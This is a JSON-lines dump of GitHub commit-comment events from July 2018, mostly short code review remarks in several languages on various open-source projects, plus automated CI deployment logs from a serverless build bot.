{"id":"7955309032","type":"CommitCommentEvent","actor":{"login":"Corthell"},"repo":{"name":"michaeldudek/Quadrox"},"payload":{"comment":{"id":29683104,"position":null,"line":null,"path":null,"commit_id":"f5dc6a958187879224dbe19b0ef82e3e2fc67580","created_at":"2018-07-12T10:17:47Z","updated_at":"2018-07-12T10:17:47Z","author_association":"COLLABORATOR","body":"Wydaje mi się, że specyfikacja w brawo jest licha... trzeba ją zmienić."}},"created_at":"2018-07-12T10:17:47Z"}
{"id":"7955310176","type":"CommitCommentEvent","actor":{"login":"jpountz"},"repo":{"name":"nknize/lucene-solr"},"payload":{"comment":{"id":29683107,"position":296,"line":296,"path":"lucene/sandbox/src/java/org/apache/lucene/search/LatLonPolygonBoundingBoxQuery.java","commit_id":"db47b7490243043b2581a071fe3efe63c7d393c3","created_at":"2018-07-12T10:18:02Z","updated_at":"2018-07-12T10:18:02Z","author_association":"NONE","body":"Maybe simplify by calling `relateRangeToQuery` instead since this code path is not performance-sensitive?"}},"created_at":"2018-07-12T10:18:02Z"}
{"id":"7955310413","type":"CommitCommentEvent","actor":{"login":"fschulze"},"repo":{"name":"gotcha/devpi"},"payload":{"comment":{"id":29683108,"position":4,"line":7,"path":"server/devpi_server/views.py","commit_id":"7875efa12fea3489de8771f91844929e862c027e","created_at":"2018-07-12T10:18:05Z","updated_at":"2018-07-12T10:18:05Z","author_association":"NONE","body":"``pyramid.compat.escape`` should be used instead of ``cgi.escape``, because the import location changed to ``html.escape`` in Python 3."}},"created_at":"2018-07-12T10:18:05Z"}
{"id":"7955311666","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29683110,"position":21,"line":21,"path":"James_Bond.py","commit_id":"659269032c3504e5d9e5418067e483946c9d352d","created_at":"2018-07-12T10:18:20Z","updated_at":"2018-07-12T10:18:20Z","author_association":"COLLABORATOR","body":"Może exit() dodać w else? Wtedy program sie zakonczy i bedzie self destruction spelniona :)"}},"created_at":"2018-07-12T10:18:20Z"}
{"id":"7955313384","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29683114,"position":30,"line":75,"path":"contracts/Remittance.sol","commit_id":"0d9555be56eb114c4f9eec3a5ab9366e1db9f055","created_at":"2018-07-12T10:18:42Z","updated_at":"2018-07-12T10:18:42Z","author_association":"NONE","body":"You can still save an `SLOAD` by moving the assignment to line 72 and doing `require(availableBalance != 0x0`"}},"created_at":"2018-07-12T10:18:42Z"}
{"id":"7955317403","type":"CommitCommentEvent","actor":{"login":"Rbiessy"},"repo":{"name":"Brolock/tensorflow"},"payload":{"comment":{"id":29683118,"position":96,"line":172,"path":"tensorflow/core/kernels/bincount_op.cc","commit_id":"1cd9d218576f2ae2b8812f323cb32353cb70dbb6","created_at":"2018-07-12T10:19:34Z","updated_at":"2018-07-12T10:19:34Z","author_association":"NONE","body":"Can you remove this extra line?"}},"created_at":"2018-07-12T10:19:34Z"}
{"id":"7955317615","type":"CommitCommentEvent","actor":{"login":"michaeldudek"},"repo":{"name":"michaeldudek/Quadrox"},"payload":{"comment":{"id":29683119,"position":null,"line":null,"path":null,"commit_id":"f5dc6a958187879224dbe19b0ef82e3e2fc67580","created_at":"2018-07-12T10:19:37Z","updated_at":"2018-07-12T10:19:37Z","author_association":"OWNER","body":"Tak, można zrobić reset tego commita"}},"created_at":"2018-07-12T10:19:37Z"}
{"id":"7955317756","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29683120,"position":52,"line":150,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:19:39Z","updated_at":"2018-07-12T10:19:39Z","author_association":"COLLABORATOR","body":"ok - so it *isn't* really required - but it is nice to see this value being selected when you select yes in fts  - imho"}},"created_at":"2018-07-12T10:19:39Z"}
{"id":"7955318286","type":"CommitCommentEvent","actor":{"login":"sohil22"},"repo":{"name":"sohil22/test-genrate"},"payload":{"comment":{"id":29683121,"position":null,"line":null,"path":null,"commit_id":"866668807521cdef195fc99ca5a7e9e97bdf3e9e","created_at":"2018-07-12T10:19:46Z","updated_at":"2018-07-12T10:19:46Z","author_association":"OWNER","body":"looks good job"}},"created_at":"2018-07-12T10:19:46Z"}
{"id":"7955318411","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29683122,"position":null,"line":null,"path":null,"commit_id":"71c5d7fce01fdf50aa06683558db60cea694870a","created_at":"2018-07-12T10:19:47Z","updated_at":"2018-07-12T10:19:47Z","author_association":"NONE","body":"### Results for event id: b8a6590a-93a6-4388-be8b-1b4335909a95\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (60 lines total):**\n\n```\n...\n    \"ContentLength\": 60601861, \n    \"ETag\": \"\\\"32952649fcdab37233d4f4466566883c\\\"\", \n    \"Metadata\": {}\n}\n>>> unpacking deps-479e442c46e9f1af05d9995c6f664096.tar.gz to /usr/workspace/clone/node_modules\n>>> running custom build commmand..\nyarn install v1.7.0\nverbose 0.911 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.911 Checking for configuration file \"/usr/local/share/.npmrc\".\nverbose 0.911 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/npmrc\".\nverbose 0.914 Checking for configuration file \"/root/.npmrc\".\nverbose 0.914 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.914 Checking for configuration file \"/usr/workspace/.npmrc\".\nverbose 0.914 Checking for configuration file \"/usr/.npmrc\".\nverbose 0.915 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.916 Checking for configuration file \"/usr/local/share/.yarnrc\".\nverbose 0.916 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/yarnrc\".\nverbose 0.916 Checking for configuration file \"/root/.yarnrc\".\nverbose 0.916 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.916 Checking for configuration file \"/usr/workspace/.yarnrc\".\nverbose 0.916 Checking for configuration file \"/usr/.yarnrc\".\nverbose 0.918 current time: 2018-07-12T10:20:01.270Z\n[1/4] Resolving packages...\nsuccess Already up-to-date.\nDone in 1.25s.\nDEPS_FOUND=true\nno package deploys directly required\nAT LEAST ONE PACKAGE DEPLOYMENT FAILED\nExecution time was 35 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-12T10:19:47Z"}
{"id":"7955319167","type":"CommitCommentEvent","actor":{"login":"Rbiessy"},"repo":{"name":"Brolock/tensorflow"},"payload":{"comment":{"id":29683123,"position":47,"line":123,"path":"tensorflow/core/kernels/bincount_op.cc","commit_id":"1cd9d218576f2ae2b8812f323cb32353cb70dbb6","created_at":"2018-07-12T10:19:57Z","updated_at":"2018-07-12T10:19:57Z","author_association":"NONE","body":"Can you remove this extra line?"}},"created_at":"2018-07-12T10:19:57Z"}
{"id":"7955319207","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29683124,"position":35,"line":86,"path":"webapp/src/main/java/education/web/platform/controllers/AdminPageController.java","commit_id":"7709605f228cbf9750a7270c41320e57ec617745","created_at":"2018-07-12T10:19:58Z","updated_at":"2018-07-12T10:19:58Z","author_association":"CONTRIBUTOR","body":"то же самое, уверн, это можно сделать без загрузки всех пользователей"}},"created_at":"2018-07-12T10:19:58Z"}
{"id":"7955319723","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29683126,"position":null,"line":null,"path":null,"commit_id":"d56c64bd83d877e7a5f0ce7c9dc28dd59f5739ec","created_at":"2018-07-12T10:20:04Z","updated_at":"2018-07-12T10:20:04Z","author_association":"NONE","body":"### Results for event id: f051ae27-6067-4e00-adf5-8582a7cf113d\n<details><summary>DockerServerless : Deploy to Lambda (82db6a) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (18 lines total):**\n\n```\n...\nGTM_EVENT_ID=f051ae27-6067-4e00-adf5-8582a7cf113d\nSLS_AWS_STAGE=dev\nGIT_PUSH_BRANCHNAME=slash\nGIT_PR_ID=\nSLS_DEPLOY_MODE=parallel\nSLS_APIGW_ENDPOINT_TYPE=EDGE\nSLS_APIGW_DOMAIN_SUFFIX=\nSLS_HTTP_PROXY=\nSLS_NO_PROXY=\n>>> cloning repo..\nCloning into 'clone'...\nerror: pathspec 'slash' did not match any file(s) known to git.\n/usr/workspace/serverless-mono-deploy.sh: line 25: /usr/workspace/clone/output/apigw-endpoints.txt: No such file or directory\ncat: /usr/workspace/clone/output/*-output.txt: No such file or directory\ncat: /usr/workspace/clone/output/*-output.txt: No such file or directory\ncheckout failed for branch slash.\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 4 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-12T10:20:04Z"}
{"id":"7955320889","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29683128,"position":70,"line":246,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T10:20:19Z","updated_at":"2018-07-12T10:20:19Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-12T10:20:19Z"}
{"id":"7955323096","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29683133,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-12T10:20:46Z","updated_at":"2018-07-12T10:20:46Z","author_association":"NONE","body":"Do you think you can now avoid saving `.sender` and still keep the same safety?"}},"created_at":"2018-07-12T10:20:46Z"}
{"id":"7955323262","type":"CommitCommentEvent","actor":{"login":"decathorpe"},"repo":{"name":"elementary/calendar"},"payload":{"comment":{"id":29683134,"position":null,"line":null,"path":null,"commit_id":"d5dd07b7cf5034928922807ebada36aac6ec3f81","created_at":"2018-07-12T10:20:48Z","updated_at":"2018-07-12T10:20:48Z","author_association":"CONTRIBUTOR","body":"Thanks!\r\n\r\nAnd I guess that's the benefit of running CI builds :wink:"}},"created_at":"2018-07-12T10:20:48Z"}
{"id":"7955326141","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29683140,"position":30,"line":30,"path":"James_Bond.py","commit_id":"659269032c3504e5d9e5418067e483946c9d352d","created_at":"2018-07-12T10:21:26Z","updated_at":"2018-07-12T10:21:26Z","author_association":"COLLABORATOR","body":"tu tez można exit()"}},"created_at":"2018-07-12T10:21:26Z"}
{"id":"7955326184","type":"CommitCommentEvent","actor":{"login":"xzr467706992"},"repo":{"name":"cosmedd/android_kernel_zuk_msm8996"},"payload":{"comment":{"id":29683142,"position":null,"line":null,"path":null,"commit_id":"d30b1ca6bfc712b305e9175d02058c68b0f369f3","created_at":"2018-07-12T10:21:26Z","updated_at":"2018-07-12T10:21:26Z","author_association":"NONE","body":"@cosmedd Bro can you tell me how to merge qcacld driver?How can I merge a repo into a folder?"}},"created_at":"2018-07-12T10:21:26Z"}
{"id":"7955327067","type":"CommitCommentEvent","actor":{"login":"arne-vdb"},"repo":{"name":"Fappy111/Gladiator"},"payload":{"comment":{"id":29683145,"position":13,"line":13,"path":"Gladiator/src/gui/DeathFrame.java","commit_id":"3f74bd760adb039acdf9e0ff28aa260e736cd7a1","created_at":"2018-07-12T10:21:38Z","updated_at":"2018-07-12T10:21:38Z","author_association":"NONE","body":"//deine mudda schwitzt beim kacken\r\n"}},"created_at":"2018-07-12T10:21:38Z"}
{"id":"7955331895","type":"CommitCommentEvent","actor":{"login":"seifbarhoumi"},"repo":{"name":"tensorflow/models"},"payload":{"comment":{"id":29683164,"position":null,"line":null,"path":null,"commit_id":"32e7d660a813c11da61a2ad35055d85df8f14b63","created_at":"2018-07-12T10:22:38Z","updated_at":"2018-07-12T10:22:38Z","author_association":"NONE","body":"AttributeError: module 'object_detection.utils.dataset_util' has no attribute 'make_initializable_iterator'"}},"created_at":"2018-07-12T10:22:38Z"}
{"id":"7955336661","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29683169,"position":59,"line":1330,"path":"webapp/src/main/java/education/web/platform/configs/initializer/TestDataInitializer.java","commit_id":"4871c41adbfa93bdf90ce2a66190b38dee24a4d3","created_at":"2018-07-12T10:23:37Z","updated_at":"2018-07-12T10:23:37Z","author_association":"CONTRIBUTOR","body":"для чего это коментировать? удали"}},"created_at":"2018-07-12T10:23:37Z"}
{"id":"7955339895","type":"CommitCommentEvent","actor":{"login":"demigodz-lord"},"repo":{"name":"Flygonyech/viper"},"payload":{"comment":{"id":29683177,"position":null,"line":null,"path":null,"commit_id":"859d64e2893e9fd0b3ab85f859a0ca5075e4bcc5","created_at":"2018-07-12T10:24:17Z","updated_at":"2018-07-12T10:24:17Z","author_association":"NONE","body":"Hi"}},"created_at":"2018-07-12T10:24:17Z"}
{"id":"7955361002","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29683223,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-12T10:28:40Z","updated_at":"2018-07-12T10:28:40Z","author_association":"MEMBER","body":"allready fixed"}},"created_at":"2018-07-12T10:28:40Z"}
{"id":"7955362296","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29683225,"position":null,"line":null,"path":null,"commit_id":"de7ca7730d18bc74aad105293f4ad97b275409f3","created_at":"2018-07-12T10:28:58Z","updated_at":"2018-07-12T10:28:58Z","author_association":"NONE","body":"### Results for event id: 9078d077-7085-4468-9bc1-410a0c5f23b0\n<details><summary>DockerServerless : Deploy to Lambda (82db6a) Execution completed.</summary>\n<p>\n\n**output tail (366 lines total):**\n\n```\n...\nService Information\nservice: sample-dynamo\nstage: dev\nregion: ap-southeast-2\nstack: sample-dynamo-dev\napi keys:\n  None\nendpoints:\n  GET - https://ut8l7bmo24.execute-api.ap-southeast-2.amazonaws.com/dev/sample-dynamo/{id}\nfunctions:\n  sample-dynamo: sample-dynamo-dev-sample-dynamo\n\nStack Outputs\nSampleDashdynamoLambdaFunctionQualifiedArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-dynamo-dev-sample-dynamo:16\nServiceEndpoint: https://ut8l7bmo24.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: sample-dynamo-dev-serverlessdeploymentbucket-1d2bzr73gaiy8\n\nServerless: Removing old service artifacts from S3...\nDone in 75.69s.\nApiGateway Endpoints:\n  GET - https://ut8l7bmo24.execute-api.ap-southeast-2.amazonaws.com/master/sample-dynamo/{id}\nSuccess:  sample-dynamo\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 9078d077-7085-4468-9bc1-410a0c5f23b0-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/9078d077-7085-4468-9bc1-410a0c5f23b0-output.tar.gz\n{\n    \"ETag\": \"\\\"4d1b09c7896820e89554a60477eea912\\\"\"\n}\nExecution time was 150 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-12T10:28:58Z"}
{"id":"7955365030","type":"CommitCommentEvent","actor":{"login":"fschulze"},"repo":{"name":"gotcha/devpi"},"payload":{"comment":{"id":29683233,"position":33,"line":269,"path":"server/devpi_server/extpypi.py","commit_id":"7875efa12fea3489de8771f91844929e862c027e","created_at":"2018-07-12T10:29:32Z","updated_at":"2018-07-12T10:29:32Z","author_association":"NONE","body":"It might be better to join ``links`` end ``requires_python`` in this method, then we don't need to repeat it as often."}},"created_at":"2018-07-12T10:29:32Z"}
{"id":"7955367576","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683237,"position":58,"line":63,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T10:30:05Z","updated_at":"2018-07-12T10:30:05Z","author_association":"NONE","body":"By `payee`, did you mean Bob? Bob wants USD, not Ether."}},"created_at":"2018-07-12T10:30:05Z"}
{"id":"7955368303","type":"CommitCommentEvent","actor":{"login":"rubenmoya"},"repo":{"name":"CartoDB/carto.js"},"payload":{"comment":{"id":29683238,"position":38,"line":33,"path":"docs/guides/04-performance-tips.md","commit_id":"a2b55ef1ddf2fd72a7a5de06c616e293fd852f88","created_at":"2018-07-12T10:30:14Z","updated_at":"2018-07-12T10:30:14Z","author_association":"MEMBER","body":"`the will automatically`?"}},"created_at":"2018-07-12T10:30:14Z"}
{"id":"7955370252","type":"CommitCommentEvent","actor":{"login":"sfireworks"},"repo":{"name":"sfireworks/sfireworks.github.io"},"payload":{"comment":{"id":29683244,"position":null,"line":null,"path":null,"commit_id":"823d0abcdab774c358d474b6ad70bbb4a5375492","created_at":"2018-07-12T10:30:37Z","updated_at":"2018-07-12T10:30:37Z","author_association":"OWNER","body":"change the theme to time-machine"}},"created_at":"2018-07-12T10:30:37Z"}
{"id":"7955373450","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29683248,"position":17,"line":17,"path":"e09/e09_02.py","commit_id":"a4c56373a352728149929edafc948eec5fc49752","created_at":"2018-07-12T10:31:18Z","updated_at":"2018-07-12T10:31:18Z","author_association":"COLLABORATOR","body":"山本　確認\r\nホスト名が「localhost」になっていないのではないでしょうか？"}},"created_at":"2018-07-12T10:31:18Z"}
{"id":"7955380756","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683260,"position":36,"line":42,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T10:32:52Z","updated_at":"2018-07-12T10:32:52Z","author_association":"NONE","body":"So, to `processPayment` successfully, `exchange` just needs to copy the 2 passwords found here and paste them in a new transaction?\r\nAll transaction parameters, including this `createPayment` one are public. If you disclose the passwords when creating the challenge, there is no challenge.\r\nHow can you \"hide\" the passwords?"}},"created_at":"2018-07-12T10:32:52Z"}
{"id":"7955383750","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29683263,"position":null,"line":null,"path":null,"commit_id":"7e3605bf2f697bf3d93afbf180d2d878df6ac413","created_at":"2018-07-12T10:33:32Z","updated_at":"2018-07-12T10:33:32Z","author_association":"NONE","body":"### Results for event id: 2dcf3391-87fc-40d1-87c3-72f0a3981dec\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (63 lines total):**\n\n```\n...\n    \"ContentLength\": 60601861, \n    \"ETag\": \"\\\"32952649fcdab37233d4f4466566883c\\\"\", \n    \"Metadata\": {}\n}\n>>> unpacking deps-479e442c46e9f1af05d9995c6f664096.tar.gz to /usr/workspace/clone/node_modules\n>>> running custom build commmand..\nyarn install v1.7.0\nverbose 0.586 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.593 Checking for configuration file \"/usr/local/share/.npmrc\".\nverbose 0.593 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/npmrc\".\nverbose 0.604 Checking for configuration file \"/root/.npmrc\".\nverbose 0.605 Checking for configuration file \"/usr/workspace/clone/.npmrc\".\nverbose 0.608 Checking for configuration file \"/usr/workspace/.npmrc\".\nverbose 0.608 Checking for configuration file \"/usr/.npmrc\".\nverbose 0.609 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.609 Checking for configuration file \"/usr/local/share/.yarnrc\".\nverbose 0.614 Checking for configuration file \"/root/.nvm/versions/node/v8.11.1/etc/yarnrc\".\nverbose 0.615 Checking for configuration file \"/root/.yarnrc\".\nverbose 0.616 Checking for configuration file \"/usr/workspace/clone/.yarnrc\".\nverbose 0.616 Checking for configuration file \"/usr/workspace/.yarnrc\".\nverbose 0.616 Checking for configuration file \"/usr/.yarnrc\".\nverbose 0.629 current time: 2018-07-12T10:33:47.871Z\n[1/4] Resolving packages...\nsuccess Already up-to-date.\nDone in 1.04s.\nDEPS_FOUND=true\nno package deploys directly required\nAT LEAST ONE PACKAGE DEPLOYMENT FAILED\nExecution time was 32 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-12T10:33:32Z"}
{"id":"7955387104","type":"CommitCommentEvent","actor":{"login":"filomon"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29683270,"position":150,"line":150,"path":"app/arpa_components/arpa-model-editor/arpa-model-editor.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T10:34:17Z","updated_at":"2018-07-12T10:34:17Z","author_association":"COLLABORATOR","body":"Corregir la ortografía de la descripción del comentario"}},"created_at":"2018-07-12T10:34:17Z"}
{"id":"7955387280","type":"CommitCommentEvent","actor":{"login":"bobkali"},"repo":{"name":"bobkali/newgit"},"payload":{"comment":{"id":29683271,"position":null,"line":null,"path":null,"commit_id":"829ba768b69ca27db0b2ead56e5b65b16e150c87","created_at":"2018-07-12T10:34:19Z","updated_at":"2018-07-12T10:34:19Z","author_association":"OWNER","body":"create app.js file"}},"created_at":"2018-07-12T10:34:19Z"}
{"id":"7955388133","type":"CommitCommentEvent","actor":{"login":"Discostu36"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29683274,"position":16,"line":25361,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"cba3a7f8c1c8888d9da6db44f51a5adcda9be201","created_at":"2018-07-12T10:34:30Z","updated_at":"2018-07-12T10:34:30Z","author_association":"CONTRIBUTOR","body":"Ist das nicht eher ein Fall für die Liste von Eigennamen?"}},"created_at":"2018-07-12T10:34:30Z"}
{"id":"7955388696","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683275,"position":38,"line":44,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T10:34:37Z","updated_at":"2018-07-12T10:34:37Z","author_association":"NONE","body":"With this test, you are only checking the ability of the entity crafting the tx to copy the same value into the function parameters. It is not really a check that \"the right amount of money was sent\"."}},"created_at":"2018-07-12T10:34:37Z"}
{"id":"7955394466","type":"CommitCommentEvent","actor":{"login":"evilebottnawi"},"repo":{"name":"cssnano/cssnano"},"payload":{"comment":{"id":29683279,"position":8,"line":106,"path":"packages/cssnano/src/__tests__/postcss-merge-longhand.js","commit_id":"2b6f26443fcb28f7e355f46637a75414ff419703","created_at":"2018-07-12T10:35:47Z","updated_at":"2018-07-12T10:35:47Z","author_association":"COLLABORATOR","body":"@ryangueraa ?"}},"created_at":"2018-07-12T10:35:47Z"}
{"id":"7955394551","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683280,"position":4,"line":45,"path":"contracts/Remittance.sol","commit_id":"6d8104d825ebcd2d5d8d9981cad4cbaa77fb3a67","created_at":"2018-07-12T10:35:48Z","updated_at":"2018-07-12T10:35:48Z","author_association":"NONE","body":"You can use Solidity words like `1 days` which equals `86400` (seconds).\r\nhttp://solidity.readthedocs.io/en/v0.4.24/units-and-global-variables.html#time-units"}},"created_at":"2018-07-12T10:35:48Z"}
{"id":"7955395591","type":"CommitCommentEvent","actor":{"login":"yedidya752"},"repo":{"name":"yedidya752/bigvu1"},"payload":{"comment":{"id":29683282,"position":9,"line":9,"path":"index.html","commit_id":"5b6939a5ec1db7402315eb4ed3223332b5e1fe6d","created_at":"2018-07-12T10:36:02Z","updated_at":"2018-07-12T10:36:02Z","author_association":"OWNER","body":"kjds\r\n"}},"created_at":"2018-07-12T10:36:02Z"}
{"id":"7955398539","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683289,"position":53,"line":58,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T10:36:39Z","updated_at":"2018-07-12T10:36:39Z","author_association":"NONE","body":"`require(!processed,` "}},"created_at":"2018-07-12T10:36:39Z"}
{"id":"7955403006","type":"CommitCommentEvent","actor":{"login":"filomon"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29683304,"position":206,"line":206,"path":"app/arpa_components/arpa-model-editor/arpa-model-editor.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T10:37:37Z","updated_at":"2018-07-12T10:37:37Z","author_association":"COLLABORATOR","body":"La _event no se utiliza en método actual "}},"created_at":"2018-07-12T10:37:37Z"}
{"id":"7955403042","type":"CommitCommentEvent","actor":{"login":"saksham-shah"},"repo":{"name":"saksham-shah/cool-turrets"},"payload":{"comment":{"id":29683305,"position":null,"line":null,"path":null,"commit_id":"368cb4df04a5cf9eae36659c1c7110f153f8132e","created_at":"2018-07-12T10:37:38Z","updated_at":"2018-07-12T10:37:38Z","author_association":"OWNER","body":"too hench? xD"}},"created_at":"2018-07-12T10:37:38Z"}
{"id":"7955407702","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29683317,"position":63,"line":67,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-12T10:38:37Z","updated_at":"2018-07-12T10:38:37Z","author_association":"NONE","body":"No checking on `!processed`? Here it does not matter because it will not be possible to get `amount - fee` out, unless... unless! `fee >= amount / 2`.\r\nIt would matter a huge deal if this contract was handling many people's money."}},"created_at":"2018-07-12T10:38:37Z"}
{"id":"7955408994","type":"CommitCommentEvent","actor":{"login":"hocus2pocus"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29683320,"position":14,"line":28,"path":"ruby_module_9/interface_station.rb","commit_id":"0adcc520c6960e18b8fbba1bb93ea0b1fb3a7400","created_at":"2018-07-12T10:38:54Z","updated_at":"2018-07-12T10:38:54Z","author_association":"OWNER","body":"Уберу комменты, пропустил."}},"created_at":"2018-07-12T10:38:54Z"}
{"id":"7955409159","type":"CommitCommentEvent","actor":{"login":"PranaliDeore"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29683323,"position":9,"line":326,"path":"puppet/services/glance-api.yaml","commit_id":"f7cc4b6e463570da034e2a1a7922b4d810232bd9","created_at":"2018-07-12T10:38:56Z","updated_at":"2018-07-12T10:38:56Z","author_association":"OWNER","body":"This needs to be passed as string..\r\nglance::api::filesystem_store_file_perm: '0644'\r\n\r\nMissed while updating the patch "}},"created_at":"2018-07-12T10:38:56Z"}
{"id":"7955411665","type":"CommitCommentEvent","actor":{"login":"Gravatronics"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":29683336,"position":20,"line":20,"path":"wcfsetup/install/files/lib/data/modification/log/IViewableModificationLog.class.php","commit_id":"00b759ae8b32ffa69b240efdd77dd9af8226337b","created_at":"2018-07-12T10:39:28Z","updated_at":"2018-07-12T10:39:28Z","author_association":"MEMBER","body":"That description appears to be outdated/incorrect. (title vs. titled object)"}},"created_at":"2018-07-12T10:39:28Z"}
{"id":"7955411804","type":"CommitCommentEvent","actor":{"login":"brimstone"},"repo":{"name":"r1ft4469/docker-kali"},"payload":{"comment":{"id":29683338,"position":null,"line":null,"path":null,"commit_id":"6b5caa93fb8157a974776843f7c681fc4979b6a7","created_at":"2018-07-12T10:39:30Z","updated_at":"2018-07-12T10:39:30Z","author_association":"NONE","body":"Love it. "}},"created_at":"2018-07-12T10:39:30Z"}
{"id":"7955412836","type":"CommitCommentEvent","actor":{"login":"dgrammatiko"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29683345,"position":9,"line":586,"path":"administrator/templates/atum/css/template-rtl.css","commit_id":"984c4582a57fa4efe69c7f858d7144b4993d414b","created_at":"2018-07-12T10:39:43Z","updated_at":"2018-07-12T10:39:43Z","author_association":"MEMBER","body":"I wasn't blaming anyone here, just saying that this can be improved. Anyways there is a PR: #21084.\r\nIf @brianteeman can confirm that IE is happy because I don;t have a VM with IE atm"}},"created_at":"2018-07-12T10:39:43Z"}
{"id":"7955414302","type":"CommitCommentEvent","actor":{"login":"Ramsjavvaji"},"repo":{"name":"Ramsjavvaji/devopspractise"},"payload":{"comment":{"id":29683348,"position":null,"line":null,"path":null,"commit_id":"1f87606633410d91251c78fec733893300f8d0ad","created_at":"2018-07-12T10:40:02Z","updated_at":"2018-07-12T10:40:02Z","author_association":"OWNER","body":"javafile new "}},"created_at":"2018-07-12T10:40:02Z"}
